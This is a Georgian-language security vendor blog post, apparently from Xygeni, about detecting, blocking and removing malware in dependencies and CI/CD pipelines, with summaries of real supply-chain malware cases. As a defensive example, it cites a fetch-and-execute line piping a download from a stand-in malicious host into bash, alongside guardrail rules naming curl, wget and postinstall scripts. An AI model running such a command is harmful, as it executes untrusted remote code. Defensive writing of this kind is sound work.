მავნე პროგრამა აღარ მხოლოდ საბოლოო წერტილებს ესხმის თავს, ის თქვენს ღია კოდის დამოკიდებულებებში იმალება, CI/CD დავალებები და ინსტალაციის შემდგომი სკრიპტებიც კი. თავდამსხმელებმა იციან, რომ დეველოპერები სწრაფად მოქმედებენ და ამ სიჩქარით სარგებლობენ. ასე რომ, თუ თქვენ არ ხართ მზად მავნე პროგრამის ადრეულ ეტაპზე აღმოსაჩენად, თქვენ უკვე რისკის ქვეშ ხართ. სწორედ ამიტომ, გაგება როგორ შევამოწმოთ მავნე პროგრამები, როგორ მოვიშოროთ მავნე პროგრამადა რეალურის ცოდნა, მავნე პროგრამების მაგალითები არა მხოლოდ სასარგებლოა, არამედ აუცილებელიც.
ამ სახელმძღვანელოში ჩვენ განვიხილავთ, თუ როგორ ამოვიცნოთ საფრთხეები ადრეულ ეტაპზე, შევაჩეროთ ისინი მათ განხორციელებამდე და წავშალოთ ისინი თქვენი კოდის ბაზიდან და pipelineსამუდამოდ. გარდა ამისა, ჩვენ ავხსნით, თუ როგორ დავიცვათ თავი მავნე პროგრამებისგან მიწოდების შენელების გარეშე.
როგორ შევამოწმოთ მავნე პროგრამა, სანამ ის წარმოებაში გავა
როგორ შევამოწმოთ მავნე პროგრამები ეს არ არის მხოლოდ უსაფრთხოების საკონტროლო სია. ეს არის უწყვეტი სტრატეგია, რომელიც ადრე იწყება და მთელ თქვენს pipelineმავნე პროგრამა, როგორც წესი, ჩუმად აღწევს გარდამავალი დამოკიდებულება, ინსტალაციის შემდგომი სკრიპტის უგულებელყოფა ან არასწორად კონფიგურირებული შექმნის ეტაპი. მისი ეფექტურად დასაბლოკად, თქვენ უნდა ხილვადობას თითოეულ ფენაზე: წყარო, დამოკიდებულებები და გაშვების დროის ქცევა. აი, როგორ შეამოწმოთ მავნე პროგრამები ადრეულ ეტაპზე, უწყვეტად და ავტომატურად Xygeni-ს გამოყენებით.
1. ნებისმიერი პროგრამის ინსტალაციამდე შეამოწმეთ რეესტრები
დღესდღეობით მავნე პროგრამების უმეტესობა იწყება დამოკიდებულებასინამდვილეში, თავდამსხმელები ხშირად ატვირთავენ მავნე პაკეტებს ისეთი სახელებით, რომლებიც პოპულარულ ბიბლიოთეკებს წააგავს. ისინი ხშირად უვნებლად გამოიყურებიან. package.json or requirements.txt, სანამ ისინი არ დაასრულებენ.
ქსიგენი ადრეული გაფრთხილების სისტემა მუდმივად აკონტროლებს ისეთ რეესტრებს, როგორიცაა npm, PyPI, Maven და Docker Hub. ის აანალიზებს პაკეტის ყველა ახალ ვერსიას გამოქვეყნებისთანავე. ჩვენ ვეძებთ:
- საეჭვო ინსტალაციის სკრიპტები (
setup.py,postinstall,install.sh) - დაბნეული კოდი (base64 blobs, კოდირებული სტრიქონები, შეფასების გამოყენება)
- ინსტალაციის დროს მოულოდნელი ქსელური ზარები
- ტიპოსკვატი სახელდების ნიმუშები
უფრო მეტიც, თუ თქვენ აწარმოებთ yarn install, npm i, ან pip installდა ერთ-ერთი პაკეტი მონიშნულია, Xygeni ავტომატურად ბლოკავს მას, თუ იყენებთ Guardrails ან CI ინტეგრაცია.
✅ პროფესიონალური რჩევა დეველოპერებისთვის: თუ სწავლობ როგორ შევამოწმოთ მავნე პროგრამები რეალურ დროში, შეგიძლიათ გადახედოთ დროშით მონიშნულ პაკეტებს პირდაპირ dashboard ან დააყენეთ შეტყობინებები Slack-ისთვის ან Teams-ისთვის webhook-ის საშუალებით, როდესაც თქვენს სისტემაში დამოკიდებულებაა SBOM აჩვენებს ცნობილ ან საეჭვო მავნე პროგრამას.
2. კოდის სკანირება Git Repos-ში, სანამ ის გაერთიანებას დაიწყებს
როგორ შევამოწმოთ მავნე პროგრამები პაკეტების სკანირებაზე მეტს მოიცავს. ზოგიერთი მავნე პროგრამა მესამე მხარის დამოკიდებულებებიდან არ მოდის. სამაგიეროდ, ის commitპირდაპირ წყაროს კოდში. ეს მოიცავს მყარად დაშიფრულ საიდუმლოებებს, საეჭვო სკრიპტებს ან ხელოვნური ინტელექტის ხელსაწყოებიდან ან ფორუმებიდან, როგორიცაა StackOverflow. ამ რისკების გავრცელებამდე აღმოსაჩენად, Xygeni სკანირებს ყველაფერს commit მდე pull request ფარული ლოგიკის, სახიფათო ნიმუშების და მავნე კოდისთვის.
ერთად ქსიგენი GitHub ინტეგრაცია, ყოველი ბიძგი ან pull request შეიძლება გამოიწვიოს:
- SAST სკანირებას უკეთებს კოდირებული ან დაბნეული დატვირთვების აღმოსაჩენად
- საიდუმლოს აღმოჩენა დადასტურებით და გაუქმებით
- ხელმისაწვდომობის ანალიზი იმის შესამოწმებლად, არის თუ არა საეჭვო კოდი რეალურად შესრულებადი
- ანომალიების აღმოჩენა ინფრა ფაილებში, shell სკრიპტებსა და CI კონფიგურაციებში ჩარევის აღსანიშნავად
PR-ების ავტომატურად სკანირებისთვის შეგიძლიათ Xygeni GitHub Actions-ში ან GitLab CI-ში ჩართოთ. ამ გზით, თუ ვინმე კომპრომეტირებულ სკრიპტს განათავსებს ან Dockerfile, სკანირება დაუყოვნებლივ დაიწყება და შერწყმას დაბლოკავს, თუ ის დაარღვევს Guardrails.
✅ Გამოყენების შემთხვევაში: თუ PR წარადგენს curl http://malicious.site | bash, Xygeni შერწყმის მცდელობისას დაარღვევს და შეაჩერებს აწყობას — სანამ ის მთავარ მცდელობისას მოხვდება.
3. მავნე პროგრამების სკანირების აღსრულება CI/CD Pipelines
მაშინაც კი, თუ ადრე რამე გამოგრჩათ, CI თქვენი ბოლო შანსია, შეაჩეროთ მავნე პროგრამა განლაგებამდე. Xygeni ინტეგრირდება ყველა ძირითად CI ინსტრუმენტში: GitHub Actions, გიტლაბი, Jenkins, ბიბუკეტი, Azure DevOps.
დამატების შემდეგ, Xygeni სკანირებს ყველა დავალებას:
- არასანდო ჩამოტვირთვები or ტვირთის მოძიება
- საშიში shell ბრძანებები or დაბნეული ლოგიკა სკრიპტებში
- ორობითი ან არტეფაქტის გაყალბება (მაგ., ხელმოუწერელი ფაილები ან ჰეშები, რომლებიც არ ემთხვევა SBOM)
- ქსელური ზარები შექმნის ან ტესტირების ეტაპების დროს
შეგიძლიათ სკანერი დააინსტალიროთ მარტივი CLI ბრძანებით ან Docker კონტეინერით და დააკონფიგურიროთ ის, რომ იმუშაოს შექმნის, ტესტირების ან განლაგების ეტაპებზე.
# GitHub Actions example
- name: Scan for malware
uses: xygeni/xygeni-action@v1
env:
XYGENI_API_KEY: ${{ secrets.XYGENI_API_KEY }}
გარდა ამისა, მავნე პროგრამის აღმოჩენის შემთხვევაში, შეგიძლიათ ავტომატურად დააზიანოთ ბილდები:
fail_on: malware
block_on: postinstall + base64 + external_url
✅ Pro რჩევა: დამატება --xygeni-check თქვენს წინასწარ აშენებულ ვერსიაზე hooks CI-ში, რათა შეაჩეროთ ცუდი ინსტალაციები კონტეინერების ან ბინარული ფაილების შექმნამდე.
4. გამოყენება Guardrails ცნობილი და უცნობი მავნე პროგრამების დაბლოკვა
წარმოების გარემოში მავნე პროგრამების ეფექტურად შემოწმების პროცესი საბაზისო სკანირებაზე მეტს მოითხოვს. წარმოების დონის აღსრულებისთვის, Xygeni გთავაზობთ საბაჟო Guardrails რაც საშუალებას გაძლევთ განსაზღვროთ წინასწარcise პოლიტიკა ქცევის, რისკის დონის ან ფაილის ტიპის მიხედვით აწყობის დაბლოკვისთვის.
შეგიძლიათ დააყენოთ ისეთი წესები, როგორიცაა:
- ნებისმიერი პაკეტის დაბლოკვა
postinstallსკრიპტის გამოძახებაwget,curl,bash,python - თუ კოდი შეიცავს, აწყობის შეწყვეტა
eval()ან დინამიური იმპორტი ცვლადიდან - დროშა commitრომლებიც ცვლიან
.github/workflows/*თუ არ დადასტურდა
ქსიგენი Guardrails მუშაობს როგორც Git-ში (შერწყმის დროს), ასევე CI/CD (აწყობის დროს). თუ წესი დაირღვება, აწყობა ან შერწყმა ავტომატურად იბლოკება და დეველოპერი მიიღებს მკაფიო მიზეზს.
✅ გაფართოებული ნაბიჯი: შექმნა Guardrails რომლებიც მხოლოდ მაღალი მგრძნობელობის ბილიკებზე ვრცელდება, როგორიცაა infra/, scripts/, ან build/და გადაფარვისთვის დამტკიცებას მოითხოვს.
საბოლოო რჩევა: სკანირება SBOMმავნე პროგრამების რისკისთვის
Xygeni ასევე სკანირებს თქვენს პროგრამული უზრუნველყოფის მასალების ჩამონათვალი (SBOM) რათა ზუსტად თვალყური ადევნოთ თქვენს ბილდში შეტანილ ინფორმაციას და შეამოწმოთ თითოეული კომპონენტი მავნე პროგრამების ქცევაზე, ლიცენზირების რისკსა და უსაფრთხოების ქულაზე.
შეგიძლიათ გენერირება SBOMs ერთად CycloneDX, SPDX, ან Syft და ატვირთეთ ისინი Xygeni-ზე უწყვეტი მონიტორინგისთვის.
SBOM სკანირება დაგეხმარებათ:
- მიწოდების ჯაჭვის კომპრომეტირების აღმოჩენა
- უზრუნველყავით რეპროდუცირებადი კონსტრუქციები
- მარეგულირებელი აუდიტების გავლა (მაგ., ევროკავშირის კიბერმდგრადობის შესახებ კანონი, აშშ-ის აღმასრულებელი ბრძანება 14028)
გაეცანით მავნე პროგრამების ადრეულ ეტაპზე აღმოჩენის საუკეთესო ინსტრუმენტებს
გაეცანით ჩვენს სახელმძღვანელოს 2025 წლის საუკეთესო მავნე პროგრამების აღმოჩენის ინსტრუმენტების შესახებ
მავნე პროგრამების მაგალითები, რომლებიც რეალურ ცხოვრებაში მოხვდა Pipelines (ტიპის მიხედვით)
ჭეშმარიტად რომ გავიგოთ როგორ შევამოწმოთ მავნე პროგრამები, სწავლაში ეხმარება მავნე პროგრამების მაგალითები რაც რეალურად მოხდა pipelineქვემოთ, ჩვენ დავაჯგუფეთ საფრთხეები ტიპის მიხედვით და ავხსენით, თუ როგორ მუშაობს თითოეული მათგანი და როგორ ეხმარება Xygeni მათ დაბლოკვაში.
ტროიანები
ტროიანები გამოსადეგ პაკეტებად ასაღებენ თავს. ინსტალაციის შემდეგ, ისინი ფონზე მავნე კოდს ასრულებენ. მაგალითად, npm პაკეტები discordyt მდე distube-config ლეგიტიმურ Discord მოდულებს ჰგავდა. სინამდვილეში, მათ განათავსეს ტროას ვირუსი, რომელიც იპარავდა ავტორიზაციის მონაცემებს, ბრაუზერის სესიებს და სისტემის მონაცემებს. თუ არ ახორციელებთ ვერსიის პინირებას ან ხელმოწერების დადასტურებას, ასეთი ტროასები შეიძლება შეუმჩნევლად შემოიპარონ.
Backdoors
Backdoors თავდამსხმელებისთვის ფარული წვდომის წერტილების შექმნა. ერთ-ერთი ყველაზე სერიოზული მავნე პროგრამის მაგალითი იყო CVE-2024-3094, სად არის liblzma შეკუმშვის ბიბლიოთეკა SSH ავტორიზაციის გვერდის ავლის მიზნით უკან დაიხია. სინამდვილეში, შეცვლილი ორობითი ფაილი რამდენიმე ვერსიაში მოხვდა. საბედნიეროდ, Xygeni-ის ფაილის მთლიანობის სკანირების მსგავსი ანომალიების აღმოჩენით, ცვლილებას ადრევე, განლაგებამდე დიდი ხნით ადრე შეამჩნევდით.
კრიპტო-მოპარვები
კიდევ ერთი მავნე პროგრამის მაგალითია კრიპტო-მპარავები. კრიპტო-მოპარვები ისეთი საიდუმლოებების ამოღება, როგორიცაა ქუქი-ფაილები, სესიის ტოკენები და საფულის გასაღებები. მავნე პროგრამა, რომელსაც ეწოდება bladeroid ზუსტად ეს გააკეთა. ის npm პაკეტებში იყო ჩაშენებული და მოპარულ მონაცემებს თავდამსხმელების მიერ კონტროლირებად საბოლოო წერტილებში ჩუმად ატვირთავდა. Xygeni-ის ადრეული გაფრთხილების სისტემამ ის დეველოპერების მიერ ჩამოტვირთვამდეც კი აღმოაჩინა.
წვეთები
წვეთები არის პატარა ჩამტვირთავი პროგრამები, რომლებიც გაშვების შემდეგ უფრო მოწინავე მავნე პროგრამებს ამუშავებენ. მაგალითად, რამდენიმე ბოლოდროინდელი PyPI პაკეტი, რომელიც გამოყენებულია setup.py ინსტალაციის შემდეგ დისტანციური shell ჩამოტვირთვების გასააქტიურებლად. თუ თქვენი pipeline ინსტალაციის ქცევას არ ამოწმებს, მათ შეუძლიათ ჩუმად იმუშაონ. Xygeni აანალიზებს ინსტალაციას. hooks, აფიქსირებს ქსელის ზარებს და აჩერებს dropper-ს გავრცელებამდე.
დაბნეული მავნე პროგრამა
დაბნეული მავნე პროგრამა მალავს განზრახვას ისეთი ხრიკების გამოყენებით, როგორიცაა სტრიქონების გაყოფა ან base64. ზოგიერთი ყალბი პაკეტი უსაფრთხოების ბიბლიოთეკებადაც კი გვევლინებოდა. ისინი აჭიანურებდნენ აღმოჩენას დინამიურ იმპორტებში ლოგიკის დამალვით. მიუხედავად ამისა, Xygeni-SAST ახდენს ლოგიკის დებფუსკაციას და ანალიზს, რათა გამოავლინოს ჩაშენებული დატვირთვები, თუნდაც მრავალ ფაილში. ეს დაბნევაზე დაფუძნებული შეტევები ერთ-ერთი ყველაზე რთული შეტევებია. მავნე პროგრამების მაგალითები სტატიკური ანალიზის გარეშე დაჭერა.
საერთო ჯამში, ეს მავნე პროგრამების მაგალითები ადასტურებს, რომ თქვენი არცერთი ნაწილი pipeline აკრძალულია. სამუშაო პროცესის ნამდვილად უსაფრთხოების უზრუნველსაყოფად, დეველოპერებმა უნდა იცოდნენ, თუ როგორ მოიშორონ მავნე პროგრამები სწრაფად და გადაამოწმონ ყველაფერი, განსაკუთრებით ის, რაც თავდაპირველად უსაფრთხოდ ჩანს.
როგორ მოვიშოროთ მავნე პროგრამა მისი აღმოჩენის შემდეგ
ძლიერი აღმოჩენის შემთხვევაშიც კი, მავნე პროგრამამ შეიძლება მაინც შეაღწიოს. შესაძლოა, ეს იყო ნულოვანი დღის dropper. შესაძლოა, ერთ-ერთმა კონტრიბუტორმა გაუცნობიერებლად გაავრცელა ინფიცირებული დამოკიდებულება. მიუხედავად ამისა, კრიტიკულად მნიშვნელოვანია იცოდეთ, თუ როგორ მოიშოროთ მავნე პროგრამა სწრაფად და უსაფრთხოდ. აი, როგორ დაგეხმარებათ Xygeni საფრთხეების აღმოფხვრაში მათი გამოვლენისთანავე, წინასწარი ინფორმაციის გამოყენებით.cisიონი და ავტომატიზაცია.
1. საფრთხის მყისიერად კარანტინში მოთავსება: ხელით გადახედვის გარეშე
მავნე პროგრამის აღმოჩენის შემდეგ, ადგილზევე შეაჩერეთ მისი კონტროლი. სწორედ აქ იწყება მავნე პროგრამის ეფექტურად მოშორების ცოდნა. Xygeni-ს ადრეული გაფრთხილების სისტემა მოქმედებს მყისიერად. ის მავნე პაკეტებს კარანტინში ტოვებს მათ მონიშვნისთანავე.
ის შლის ამ პაკეტებს ყველა აწყობის კონტექსტიდან, ბლოკავს მომავალ ინსტალაციებს და აწესებს შავ სიებს როგორც რეესტრის, ასევე პროექტის დონეზე.
თუ თქვენ იყენებთ კერძო პაკეტების რეესტრს, Xygeni კარანტინს მთელ თქვენს ორგანიზაციაზე ავრცელებს. მოკლედ, როგორც კი Xygeni პაკეტს მავნედ მონიშნავს, ვერცერთი გუნდი ვერ შეძლებს მის ხელახლა გამოყენებას.
✅ Pro რჩევა: ჩართეთ რეალურ დროში შეტყობინებები, რათა თქვენს გუნდს გაუგზავნოთ Slack-ის ან Jira-ს შეტყობინებები, როდესაც Xygeni კარანტინს აწესებს.
2. ავტომატურად დაარღვიეთ აწყობა Guardrails
მავნე პროგრამის შეჩერება მხოლოდ გაფრთხილებებს არ ეხება, ეს ავტომატური აღსრულებასწორედ აქ არის Xygeni Guardrails შემოდი. შეგიძლია წინასწარ განსაზღვროcisელექტრონული პოლიტიკა, როგორიცაა:
fail_on: malware
block_if: postinstall + base64 + external_url
ეს წესები საშუალებას გაძლევთ მყისიერად ჩაშალოთ აწყობა, თუ:
- დამოკიდებულება ქცევით ინდიკატორებს იწვევს
- კოდი შეიცავს დაბნეულ ლოგიკას
- საიდუმლოებები გვხვდება, commit ისტორია
- უცნობი ბინარული ფაილები ან სკრიპტები შედიან pipeline
შეგიძლიათ მასშტაბირება Guardrails რეპოს, განშტოების, სიმძიმის ან ფაილის გზის მიხედვით, რაც გაძლევთ სრულყოფილ კონტროლს. რაც მთავარია, დეველოპერები იღებენ მკაფიო, კონტექსტუალურ უკუკავშირს პირდაპირ თავიანთ CI ჟურნალებში ან PR კომენტარებში.
Guardrails ეს არ არის მხოლოდ აღმოჩენა, ეს არის ავტომატური დაცვა, რომელიც მასშტაბირდება.
3. გაჟონილი საიდუმლოებების გაუქმება რეალურ დროში
ბევრი მავნე პროგრამული კამპანია საიდუმლოებების მოპოვებას ისახავს მიზნად: ღრუბლოვანი ავტორიზაციის მონაცემები, API ტოკენები, GitHub OAuths. თუ მავნე პროგრამას აღმოაჩენთ, უნდა იფიქროთ, რომ რაღაც გამოვლინდა.
Xygeni-ს საიდუმლოებები უსაფრთხოება მოდული:
- სკანირებს Git-ის ისტორიას ხელით ან მავნე პროგრამების მიერ შეყვანილი საიდუმლოებების აღმოსაჩენად
- ამოწმებს, კვლავ აქტიურია თუ არა საიდუმლოებები
- ავტომატურად აუქმებს და ცვლის მათ ჩაშენებული ინტეგრაციების გამოყენებით
თქვენ მიიღებთ სრულ შეჯამებას:
- რომელი საიდუმლოებები გამჟღავნდა
- სადაც ისინი კოდში ცხოვრობდნენ
- რა გამოსწორების ნაბიჯები იქნა გადადგმული (გაუქმებული, როტირებული, ჩანაცვლებული)
არანაირი ცხრილები. არანაირი ვარაუდი. არანაირი ხანძრის ჩაქრობა.
4. მავნე დამოკიდებულების ავტომატური გამოსწორება, სისუფთავე და უსაფრთხოება
თუ მავნე პროგრამა კომპრომეტირებული ან დაუცველი პაკეტის მეშვეობით შემოვიდა, შემდეგი ნაბიჯი მისი გამოსწორებაა. Xygeni-ს ავტომატური შეკეთება ძრავა დაგეხმარებათ პრობლემის სწრაფად მოგვარებაში, ახალი რისკების შექმნის გარეშე.
ის აანალიზებს:
- რომელი ვერსიებია სუფთა
- შემოაქვს თუ არა გამოსწორება ახალ CVE-ებს
- თუ რაიმე დამანგრეველი ცვლილება გავლენას მოახდენს თქვენს კონსტრუქციაზე
შემდეგ ის ქმნის შერწყმისთვის მზა ფორმას pull request, მოცულია მხოლოდ დაზარალებულ კომპონენტებზე.
xygeni autofix --target package.json --apply
თქვენ მიიღებთ სუფთა განახლებებს ყოველგვარი ვარაუდის გარეშე, მხოლოდ უსაფრთხო, დადასტურებულ განახლებებს.
5. ინციდენტის კვალის დადგენა Commit არტეფაქტამდე
და ბოლოს, მავნე პროგრამის მოშორების ცოდნა ასევე ნიშნავს იმის გაგებას, თუ რა მოხდა და მისი დამტკიცების შესაძლებლობას. Xygeni უზრუნველყოფს ინციდენტის სრულ ატრიბუციას და ამოწმების მონაცემების მეშვეობით ახდენს თვალყურის დევნებას.
ნებისმიერი მავნე პროგრამის შემთხვევაში, შეგიძლიათ თვალყური ადევნოთ:
- ის წასვლა commit ან საზოგადოებასთან ურთიერთობის რომელმაც კომპონენტი წარადგინა
- ის CI/CD ნაბიჯები ის გაიარა
- ის სურათები ან არტეფაქტები ის დაეშვა
- მიუხედავად იმისა, ის იყო ხელმოწერილი, სკანირებული და დამოწმებული
ეს ორივეს გაძლევთ ძირეული მიზეზის ხილვადობა მდე სასამართლო ექსპერტიზის მტკიცებულება, აუცილებელია შიდა აუდიტებისთვის, შესაბამისობის ანგარიშებისთვის ან ინციდენტებზე რეაგირებისთვის.
Xygeni აფიქსირებს დროის ნიშნულებს, იცავს და ყველა აუდიტის კვალს სრულად ექსპორტირებადს ხდის.
ეს ნაბიჯები ერთად თქვენს გუნდს სრულ და ავტომატიზირებულ რეაგირების გეგმას აძლევს. საფრთხის მონიშვნის მომენტიდან მის გამოსწორებამდე და კვალის მიკვლევამდე, Xygeni ზუსტად გაჩვენებთ, თუ როგორ მოიშოროთ მავნე პროგრამა თქვენი კოდის ბაზაზე და pipelineს. თქვენ აღარ რეაგირებთ ზეწოლის ქვეშ, რეაგირებთ კონტროლით, წინასწარcisიონი და თავდაჯერებულობა ყოველ ჯერზე.
ადრეული აღმოჩენა. სწრაფად მოქმედება. სამუდამოდ შეჩერება.
მავნე პროგრამები არ ნელდება და თქვენი უსაფრთხოებაც არ უნდა შენელდეს. როგორც ამ პოსტის განმავლობაში ნახეთ, იმის ცოდნა, რომ როგორ შევამოწმოთ მავნე პროგრამები თქვენს კოდის ბაზაში და CI/CD სამუშაო პროცესები თავდაცვის პირველი ხაზია. არანაკლებ მნიშვნელოვანია, რომ თქვენ ისწავლეთ როგორ მოვიშოროთ მავნე პროგრამა უსაფრთხოდ და სწრაფად, მისი აღმოჩენის შემდეგ, კონსტრუქციების დაშლის ან თქვენი გუნდის გადატვირთვის გარეშე.
ჩვენ ასევე გავიარეთ რეალური მავნე პროგრამების მაგალითები რომლებიც ზუსტად აჩვენებს, თუ როგორ იყენებენ თავდამსხმელები დეველოპერის ინსტრუმენტებს, ღია კოდის რეესტრებსა და ავტომატიზაციის სკრიპტებს.
Xygeni-ს დახმარებით თქვენ შეგიძლიათ:
- საფრთხეების აღმოჩენა თქვენს სხეულზე pipelineრეალურ დროში
- აღსრულება Guardrails ეს შესვენება მავნე ქცევას ეფუძნება
- გაჟონილი საიდუმლოებების ავტომატურად გაუქმება
- მავნე ან დაუცველი პაკეტების შეკეთება AutoFix-ის გამოყენებით
- კოდიდან ყველა ინციდენტის თვალყურის დევნება commit წარმოების არტეფაქტამდე
მოკლედ, თქვენ რეაქტიული დასუფთავებიდან პროაქტიულ პრევენციაზე გადადიხართ.
დაიწყეთ თქვენი უფასო საცდელი პერიოდი: საკრედიტო ბარათის გარეშე, უსიამოვნებების გარეშე. მხოლოდ სუფთა კონსტრუქცია და სიმშვიდე. ან წიგნის დემო რომ ნახოთ, თუ როგორ ინტეგრირდება Xygeni თქვენს არსებულ სტეკთან.







